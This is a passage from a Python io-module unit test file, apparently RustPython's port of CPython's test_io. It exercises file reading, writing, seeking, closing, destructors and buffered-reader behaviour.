buffer[:] = b"*" * 9 # Overwrite our copy of the data
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.write(b"h"), 1)
self.assertEqual(f.seek(-1, 2), 13)
self.assertEqual(f.tell(), 13)
self.assertEqual(f.truncate(12), 12)
self.assertEqual(f.tell(), 13)
self.assertRaises(TypeError, f.seek, 0.0)
def read_ops(self, f, buffered=False):
data = f.read(5)
self.assertEqual(data, b"hello")
data = byteslike(data)
self.assertEqual(f.readinto(data), 5)
self.assertEqual(bytes(data), b" worl")
data = bytearray(5)
self.assertEqual(f.readinto(data), 2)
self.assertEqual(len(data), 5)
self.assertEqual(data[:2], b"d\n")
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(20), b"hello world\n")
self.assertEqual(f.read(1), b"")
self.assertEqual(f.readinto(byteslike(b"x")), 0)
self.assertEqual(f.seek(-6, 2), 6)
self.assertEqual(f.read(5), b"world")
self.assertEqual(f.read(0), b"")
self.assertEqual(f.readinto(byteslike()), 0)
self.assertEqual(f.seek(-6, 1), 5)
self.assertEqual(f.read(5), b" worl")
self.assertEqual(f.tell(), 10)
self.assertRaises(TypeError, f.seek, 0.0)
if buffered:
f.seek(0)
self.assertEqual(f.read(), b"hello world\n")
f.seek(6)
self.assertEqual(f.read(), b"world\n")
self.assertEqual(f.read(), b"")
f.seek(0)
data = byteslike(5)
self.assertEqual(f.readinto1(data), 5)
self.assertEqual(bytes(data), b"hello")
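    # Offset used by large_file_ops(): seeking past 2**31 bytes exercises
    # large-file (64-bit offset) support.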
LARGE = 2**31
def large_file_ops(self, f):
assert f.readable()
assert f.writable()
try:
self.assertEqual(f.seek(self.LARGE), self.LARGE)
except (OverflowError, ValueError):
self.skipTest("no largefile support")
self.assertEqual(f.tell(), self.LARGE)
self.assertEqual(f.write(b"xxx"), 3)
self.assertEqual(f.tell(), self.LARGE + 3)
self.assertEqual(f.seek(-1, 1), self.LARGE + 2)
self.assertEqual(f.truncate(), self.LARGE + 2)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 2)
self.assertEqual(f.truncate(self.LARGE + 1), self.LARGE + 1)
self.assertEqual(f.tell(), self.LARGE + 2)
self.assertEqual(f.seek(0, 2), self.LARGE + 1)
self.assertEqual(f.seek(-1, 2), self.LARGE)
self.assertEqual(f.read(2), b"x")
def test_invalid_operations(self):
# Try writing on a file opened in read mode and vice-versa.
exc = self.UnsupportedOperation
for mode in ("w", "wb"):
with self.open(os_helper.TESTFN, mode) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "wb", buffering=0) as fp:
self.assertRaises(exc, fp.read)
self.assertRaises(exc, fp.readline)
with self.open(os_helper.TESTFN, "rb", buffering=0) as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(os_helper.TESTFN, "rb") as fp:
self.assertRaises(exc, fp.write, b"blah")
self.assertRaises(exc, fp.writelines, [b"blah\n"])
with self.open(os_helper.TESTFN, "r") as fp:
self.assertRaises(exc, fp.write, "blah")
self.assertRaises(exc, fp.writelines, ["blah\n"])
# Non-zero seeking from current or end pos
self.assertRaises(exc, fp.seek, 1, self.SEEK_CUR)
self.assertRaises(exc, fp.seek, -1, self.SEEK_END)
def test_optional_abilities(self):
# Test for OSError when optional APIs are not supported
# The purpose of this test is to try fileno(), reading, writing and
# seeking operations with various objects that indicate they do not
# support these operations.
def pipe_reader():
[r, w] = os.pipe()
os.close(w) # So that read() is harmless
return self.FileIO(r, "r")
def pipe_writer():
[r, w] = os.pipe()
self.addCleanup(os.close, r)
# Guarantee that we can write into the pipe without blocking
thread = threading.Thread(target=os.read, args=(r, 100))
thread.start()
self.addCleanup(thread.join)
return self.FileIO(w, "w")
def buffered_reader():
return self.BufferedReader(self.MockUnseekableIO())
def buffered_writer():
return self.BufferedWriter(self.MockUnseekableIO())
def buffered_random():
return self.BufferedRandom(self.BytesIO())
def buffered_rw_pair():
return self.BufferedRWPair(self.MockUnseekableIO(),
self.MockUnseekableIO())
def text_reader():
class UnseekableReader(self.MockUnseekableIO):
writable = self.BufferedIOBase.writable
write = self.BufferedIOBase.write
return self.TextIOWrapper(UnseekableReader(), "ascii")
def text_writer():
class UnseekableWriter(self.MockUnseekableIO):
readable = self.BufferedIOBase.readable
read = self.BufferedIOBase.read
return self.TextIOWrapper(UnseekableWriter(), "ascii")
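        # Each entry pairs a stream factory with an "abilities" string checked
        # by the loop below: "f" = has a real fileno, "r" = readable,
        # "w" = writable, "s" = seekable.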
tests = (
(pipe_reader, "fr"), (pipe_writer, "fw"),
(buffered_reader, "r"), (buffered_writer, "w"),
(buffered_random, "rws"), (buffered_rw_pair, "rw"),
(text_reader, "r"), (text_writer, "w"),
(self.BytesIO, "rws"), (self.StringIO, "rws"),
)
for [test, abilities] in tests:
with self.subTest(test), test() as obj:
readable = "r" in abilities
self.assertEqual(obj.readable(), readable)
writable = "w" in abilities
self.assertEqual(obj.writable(), writable)
if isinstance(obj, self.TextIOBase):
data = "3"
elif isinstance(obj, (self.BufferedIOBase, self.RawIOBase)):
data = b"3"
else:
self.fail("Unknown base class")
if "f" in abilities:
obj.fileno()
else:
self.assertRaises(OSError, obj.fileno)
if readable:
obj.read(1)
obj.read()
else:
self.assertRaises(OSError, obj.read, 1)
self.assertRaises(OSError, obj.read)
if writable:
obj.write(data)
else:
self.assertRaises(OSError, obj.write, data)
if sys.platform.startswith("win") and test in (
pipe_reader, pipe_writer):
# Pipes seem to appear as seekable on Windows
continue
seekable = "s" in abilities
self.assertEqual(obj.seekable(), seekable)
if seekable:
obj.tell()
obj.seek(0)
else:
self.assertRaises(OSError, obj.tell)
self.assertRaises(OSError, obj.seek, 0)
if writable and seekable:
obj.truncate()
obj.truncate(0)
else:
self.assertRaises(OSError, obj.truncate)
self.assertRaises(OSError, obj.truncate, 0)
def test_open_handles_NUL_chars(self):
fn_with_NUL = 'foo\0bar'
self.assertRaises(ValueError, self.open, fn_with_NUL, 'w')
bytes_fn = bytes(fn_with_NUL, 'ascii')
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
self.assertRaises(ValueError, self.open, bytes_fn, 'w')
def test_raw_file_io(self):
with self.open(os_helper.TESTFN, "wb", buffering=0) as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(os_helper.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f)
def test_buffered_file_io(self):
with self.open(os_helper.TESTFN, "wb") as f:
self.assertEqual(f.readable(), False)
self.assertEqual(f.writable(), True)
self.assertEqual(f.seekable(), True)
self.write_ops(f)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.readable(), True)
self.assertEqual(f.writable(), False)
self.assertEqual(f.seekable(), True)
self.read_ops(f, True)
def test_readline(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"abc\ndef\nxyzzy\nfoo\x00bar\nanother line")
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.readline(), b"abc\n")
self.assertEqual(f.readline(10), b"def\n")
self.assertEqual(f.readline(2), b"xy")
self.assertEqual(f.readline(4), b"zzy\n")
self.assertEqual(f.readline(), b"foo\x00bar\n")
self.assertEqual(f.readline(None), b"another line")
self.assertRaises(TypeError, f.readline, 5.3)
with self.open(os_helper.TESTFN, "r") as f:
self.assertRaises(TypeError, f.readline, 5.3)
def test_readline_nonsizeable(self):
# Issue #30061
# Crash when readline() returns an object without __len__
class R(self.IOBase):
def readline(self):
return None
self.assertRaises((TypeError, StopIteration), next, R())
def test_next_nonsizeable(self):
# Issue #30061
# Crash when __next__() returns an object without __len__
class R(self.IOBase):
def __next__(self):
return None
self.assertRaises(TypeError, R().readlines, 1)
def test_raw_bytes_io(self):
f = self.BytesIO()
self.write_ops(f)
data = f.getvalue()
self.assertEqual(data, b"hello world\n")
f = self.BytesIO(data)
self.read_ops(f, True)
def test_large_file_ops(self):
# On Windows and Mac OSX this test consumes large resources; It takes
# a long time to build the >2 GiB file and takes >2 GiB of disk space
# therefore the resource must be enabled to run this test.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
support.requires(
'largefile',
'test requires %s bytes and a long time to run' % self.LARGE)
with self.open(os_helper.TESTFN, "w+b", 0) as f:
self.large_file_ops(f)
with self.open(os_helper.TESTFN, "w+b") as f:
self.large_file_ops(f)
def test_with_open(self):
for bufsize in (0, 100):
f = None
with self.open(os_helper.TESTFN, "wb", bufsize) as f:
f.write(b"xxx")
self.assertEqual(f.closed, True)
f = None
try:
with self.open(os_helper.TESTFN, "wb", bufsize) as f:
1/0
except ZeroDivisionError:
self.assertEqual(f.closed, True)
else:
self.fail("1/0 didn't raise an exception")
# issue 5008
def test_append_mode_tell(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(os_helper.TESTFN, "ab", buffering=0) as f:
self.assertEqual(f.tell(), 3)
with self.open(os_helper.TESTFN, "ab") as f:
self.assertEqual(f.tell(), 3)
with self.open(os_helper.TESTFN, "a") as f:
self.assertGreater(f.tell(), 0)
def test_destructor(self):
record = []
class MyFileIO(self.FileIO):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
with support.check_warnings(('', ResourceWarning)):
f = MyFileIO(os_helper.TESTFN, "wb")
f.write(b"xxx")
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def _check_base_destructor(self, base):
record = []
class MyIO(base):
def __init__(self):
# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super().close()
def flush(self):
record.append(self.on_flush)
super().flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array('i', range(10))
n = len(a.tobytes())
def check(f):
with f:
self.assertEqual(f.write(a), n)
f.writelines((a,))
check(self.BytesIO())
check(self.FileIO(os_helper.TESTFN, "w"))
check(self.BufferedWriter(self.MockRawIO()))
check(self.BufferedRandom(self.MockRawIO()))
check(self.BufferedRWPair(self.MockRawIO(), self.MockRawIO()))
def test_closefd(self):
self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(os_helper.TESTFN, "w") as f:
f.write("egg\n")
with self.open(os_helper.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
with self.open(os_helper.TESTFN, "rb") as f:
file = self.open(f.fileno(), "rb", closefd=False)
self.assertEqual(file.read()[:3], b"egg")
file.close()
self.assertRaises(ValueError, file.readinto, bytearray(1))
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, os_helper.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(os_helper.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(os_helper.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
with support.check_warnings(('', ResourceWarning)):
f = self.FileIO(os_helper.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2 GiB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise OSError()
f.flush = bad_flush
self.assertRaises(OSError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(os_helper.TESTFN, 'wb', buffering=0)
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(os_helper.TESTFN, 'wb')
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(os_helper.TESTFN, 'w')
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(os_helper.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(os_helper.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default limited RawIOBase.read(n) implementation (which
# calls readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(os_helper.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(os_helper.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_bad_opener_negative_1(self):
# Issue #27066.
def badopener(fname, flags):
return -1
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -1')
def test_bad_opener_other_negative(self):
# Issue #27066.
def badopener(fname, flags):
return -2
with self.assertRaises(ValueError) as cm:
open('non-existent', 'r', opener=badopener)
self.assertEqual(str(cm.exception), 'opener returned -2')
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(os_helper.TESTFN, 'w', buffering=0)
def test_invalid_newline(self):
with support.check_no_resource_warning(self):
with self.assertRaises(ValueError):
self.open(os_helper.TESTFN, 'w', newline='invalid')
def test_buffered_readinto_mixin(self):
# Test the implementation provided by BufferedIOBase
class Stream(self.BufferedIOBase):
def read(self, size):
return b"12345"
read1 = read
stream = Stream()
for method in ("readinto", "readinto1"):
with self.subTest(method):
buffer = byteslike(5)
self.assertEqual(getattr(stream, method)(buffer), 5)
self.assertEqual(bytes(buffer), b"12345")
def test_fspath_support(self):
def check_path_succeeds(path):
with self.open(path, "w") as f:
f.write("egg\n")
with self.open(path, "r") as f:
self.assertEqual(f.read(), "egg\n")
check_path_succeeds(FakePath(os_helper.TESTFN))
check_path_succeeds(FakePath(os_helper.TESTFN.encode('utf-8')))
with self.open(os_helper.TESTFN, "w") as f:
bad_path = FakePath(f.fileno())
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(None)
with self.assertRaises(TypeError):
self.open(bad_path, 'w')
bad_path = FakePath(FloatingPointError)
with self.assertRaises(FloatingPointError):
self.open(bad_path, 'w')
# ensure that refcounting is correct with some error conditions
with self.assertRaisesRegex(ValueError, 'read/write/append mode'):
self.open(FakePath(os_helper.TESTFN), 'rwxa')
def test_RawIOBase_readall(self):
# Exercise the default unlimited RawIOBase.read() and readall()
# implementations.
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.read(), b"abcdefg")
rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg"))
self.assertEqual(rawio.readall(), b"abcdefg")
def test_BufferedIOBase_readinto(self):
# Exercise the default BufferedIOBase.readinto() and readinto1()
# implementations (which call read() or read1() internally).
class Reader(self.BufferedIOBase):
def __init__(self, avail):
self.avail = avail
def read(self, size):
result = self.avail[:size]
self.avail = self.avail[size:]
return result
def read1(self, size):
"""Returns no more than 5 bytes at once"""
return self.read(min(size, 5))
tests = (
# (test method, total data available, read buffer size, expected
# read size)
("readinto", 10, 5, 5),
("readinto", 10, 6, 6), # More than read1() can return
("readinto", 5, 6, 5), # Buffer larger than total available
("readinto", 6, 7, 6),
("readinto", 10, 0, 0), # Empty buffer
("readinto1", 10, 5, 5), # Result limited to single read1() call
("readinto1", 10, 6, 5), # Buffer larger than read1() can return
("readinto1", 5, 6, 5), # Buffer larger than total available
("readinto1", 6, 7, 5),
("readinto1", 10, 0, 0), # Empty buffer
)
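        # Sentinel byte used to pre-fill the destination buffer so the test
        # can verify that positions beyond the reported read count are left
        # untouched.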
UNUSED_BYTE = 0x81
for test in tests:
with self.subTest(test):
method, avail, request, result = test
reader = Reader(bytes(range(avail)))
buffer = bytearray((UNUSED_BYTE,) * request)
method = getattr(reader, method)
self.assertEqual(method(buffer), result)
self.assertEqual(len(buffer), request)
self.assertSequenceEqual(buffer[:result], range(result))
unused = (UNUSED_BYTE,) * (request - result)
self.assertSequenceEqual(buffer[result:], unused)
self.assertEqual(len(reader.avail), avail - result)
def test_close_assert(self):
class R(self.IOBase):
def __setattr__(self, name, value):
pass
def flush(self):
raise OSError()
f = R()
# This would cause an assertion failure.
self.assertRaises(OSError, f.close)
# Silence destructor error
R.flush = lambda self: None
class CIOTest(IOTest):
# TODO: RUSTPYTHON, cyclic gc
@unittest.expectedFailure
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
# TODO: RUSTPYTHON, AssertionError: filter ('', ResourceWarning) did not catch any warning
@unittest.expectedFailure
    def test_destructor(self):
        super().test_destructor()
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
del bufio
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
# TODO: RUSTPYTHON, sys.unraisablehook
@unittest.expectedFailure
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.tp(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertRegex(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertRegex(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname)
def test_recursive_repr(self):
# Issue #25455
raw = self.MockRawIO()
b = self.tp(raw)
with support.swap_attr(raw, 'name', b):
try:
repr(b) # Should not crash
except RuntimeError:
pass
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
# Silence destructor error
raw.close = lambda: None
b.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
# Silence destructor error
b.flush = lambda: None
raw.close = lambda: None
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
    def test_buffer_freeing(self):
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
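    # read1() must issue at most one read on the underlying raw stream per
    # call and may be satisfied entirely from the internal buffer, which is
    # what the _reads counters below verify.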
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"", bufio.read1(0))
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
def test_read1_arbitrary(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"bc", bufio.read1())
self.assertEqual(b"d", bufio.read1())
self.assertEqual(b"efg", bufio.read1(-1))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1())
self.assertEqual(rawio._reads, 4)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
